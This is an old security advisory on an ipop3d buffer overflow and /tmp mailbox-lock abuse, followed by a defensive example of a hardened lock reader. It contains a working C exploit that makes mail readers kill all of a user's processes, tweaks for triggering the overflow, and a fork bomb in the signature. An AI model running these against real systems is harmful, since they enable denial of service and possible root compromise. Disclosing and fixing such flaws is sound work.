Date: Sun, 7 Mar 1999 01:41:25 +0100
From: Michal Zalewski

Overflow in CAC.Washington.EDU ipop3d 4.xx

CAC.Washington.EDU ipop3d 4.xx, at least on the Linux platform, has a serious security hole. When data is read from the so-called mailbox lock created in the /tmp directory (this happens under certain conditions; refer to the exploit code below), it is stored in a _too_small_ buffer. It is possible to overwrite some data, and registers as well.

For testing purposes, the simple exploit code presented below can be used, with the following changes:

  write(i,"-1",2)  -> write(i,"(about 1100 bytes)",1100)
  ftruncate(i,2)   -> ftruncate(i,1100);

An exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid). CAC.Washington.EDU ipop3d is shipped by default with Red Hat Linux, included in the IMAP package.

Solution: look for something like kill(i,SIGUSR2) in the sources and modify the lines just before it ;>

The problem is probably well known, but silently ignored by the pine vendors. Unfortunately, it is possible to turn this 'mostly harmless feature' into something nasty. The lock file holds the PID of the lock holder, and the reader later signals that PID with SIGUSR2 as part of the mailbox access negotiation; with the body replaced by "-1", that kill(-1, SIGUSR2) reaches every process the caller is allowed to signal. The following code therefore allows various DoSes by killing all processes of the luser (could be root?) every time he/she runs pine or receives mail via the POP3 protocol:

-- lock-exploit.c --
// Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff.
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/file.h>
#include <sys/stat.h>

int main(int argc, char *argv[])
{
    int i, a = 0;
    char s[100];
    struct stat x;

    if (!argv[1])
        exit(printf("Usage: %s account_name\n", argv[0]));
    sprintf(s, "/var/spool/mail/%s", argv[1]);
    if (stat(s, &x))
        exit(printf("Mailbox (%s) not found.\n", s));
    /* the lock is named after the mailbox's device and inode numbers */
    sprintf(s, "/tmp/.%x.%x", (int)x.st_dev, (int)x.st_ino);
    /* create it world-writable so the victim's mail reader will use it */
    fchmod(i = open(s, O_RDWR | O_CREAT, 0600), 0666);
    while (1) {
        /* keep the lock body at "-1": the "PID" the reader will kill() */
        lseek(i, 0, 0);
        write(i, "-1", 2);
        ftruncate(i, 2);
        fsync(i);
        if (!a++) {
            if (!flock(i, LOCK_EX))
                printf("Got lock on %s.\n", s);
            else
                printf("File %s already locked, wait...\n", s);
        }
        sleep(1);
    }
}
-- eof --

Works well under Linux.
Under BSD, pine seems to have broken mailbox access negotiation (fortunately ;-). No information about ipop3d. Mainly, this vulnerability demonstrates that world-writable mailbox locks in /tmp are a SICK IDEA (one day, as I recall, one of the pine vendors said it was 'harmless', while other solutions allow several DoS attacks... huh).

-
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] [http://lcamtuf.na.export.pl]
bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86]
[pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]
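As an added example (not part of the advisory, and not the ipop3d/c-client source), the following C program shows the consumer side of the lock file the exploit above targets. The naive reader has the two properties the advisory describes: it copies the lock body into a small fixed buffer without a bound, and it uses whatever number it finds as a PID, so a body of "-1" would turn the later kill(pid, SIGUSR2) into a broadcast. The hardened reader bounds the copy, refuses a lock that is not a regular file owned by the caller or that group/others can write, and accepts only a lone, strictly positive PID. The /tmp/.<dev>.<ino> naming follows the advisory's exploit; LOCK_BODY_MAX and the function names are this example's own assumptions, and main() probes the PID with signal 0 instead of sending SIGUSR2.

```c
/* Added example, not ipop3d/c-client code: a lock-file consumer shown both the
 * way the advisory describes it (naive) and hardened.  Assumptions: the lock
 * body is a decimal PID, LOCK_BODY_MAX is our own limit, and the
 * /tmp/.<dev>.<ino> name follows the advisory's exploit. */
#define _GNU_SOURCE 1
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0            /* strict builds: rely on the fstat checks alone */
#endif
#define LOCK_BODY_MAX 32        /* a PID and a newline need far fewer bytes */

/* NAIVE (the advisory's pattern): unbounded copy into a small buffer, number
 * used as-is.  ~1100 bytes smash the stack; "-1" makes the caller's later
 * kill(pid, SIGUSR2) a kill(-1, SIGUSR2).  Shown only; never use on real input. */
static long lock_pid_naive(const char *body)
{
    char tmp[8];
    strcpy(tmp, body);
    return atol(tmp);
}

/* HARDENED: parse a body of known length.  Returns 0 and sets *out, or -1 on
 * anything that is not a lone, strictly positive PID (optional trailing \n). */
static int lock_pid_safe(const char *body, size_t len, pid_t *out)
{
    char tmp[LOCK_BODY_MAX + 1], *end;
    long v;
    if (len > LOCK_BODY_MAX)
        return -1;                      /* oversize body: refuse, never copy */
    memcpy(tmp, body, len);
    tmp[len] = '\0';
    errno = 0;
    v = strtol(tmp, &end, 10);
    if (errno != 0 || end == tmp || v <= 0 || v > INT_MAX)
        return -1;                      /* junk, out of range, 0 (group) or -1 (broadcast) */
    if (*end != '\0' && !(*end == '\n' && end[1] == '\0'))
        return -1;                      /* trailing garbage after the number */
    *out = (pid_t)v;
    return 0;
}

/* HARDENED: 1 only for a regular file owned by us that group/others cannot
 * write, so no other local user dictates what we parse (a 0666 /tmp lock fails). */
static int lock_fd_trusted(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    return st.st_uid == geteuid() && !(st.st_mode & (S_IWGRP | S_IWOTH));
}

/* Open, vet and parse a lock file with a bounded read.  0 on success, -1 otherwise. */
static int read_lock_pid(const char *path, pid_t *out)
{
    char buf[LOCK_BODY_MAX + 1];    /* one spare byte exposes oversize bodies */
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    ssize_t n = -1;
    if (fd < 0)
        return -1;
    if (lock_fd_trusted(fd))
        n = read(fd, buf, sizeof buf);
    close(fd);
    return n < 0 ? -1 : lock_pid_safe(buf, (size_t)n, out);
}

int main(int argc, char *argv[])
{
    struct stat mb;
    char lock[64];
    pid_t holder;
    if (argc != 2 || stat(argv[1], &mb) != 0) {
        fprintf(stderr, "usage: %s /var/spool/mail/<user>\n", argv[0]);
        return 2;
    }
    snprintf(lock, sizeof lock, "/tmp/.%x.%x", (unsigned)mb.st_dev, (unsigned)mb.st_ino);
    if (read_lock_pid(lock, &holder) != 0) {
        printf("%s: no trustworthy holder PID, signalling nobody\n", lock);
        return 1;
    }
    /* signal 0 only probes existence; a real locker would send SIGUSR2 here */
    printf("%s -> PID %ld is %s\n", lock, (long)holder,
           kill(holder, 0) == 0 ? "alive" : strerror(errno));
    return 0;
}
```

Run it against a mailbox path while lock-exploit.c is holding the lock: the 0666 mode alone makes the hardened reader refuse the file, and even a 0600 lock whose body is "-1" or an oversized string is rejected before any kill() is reached.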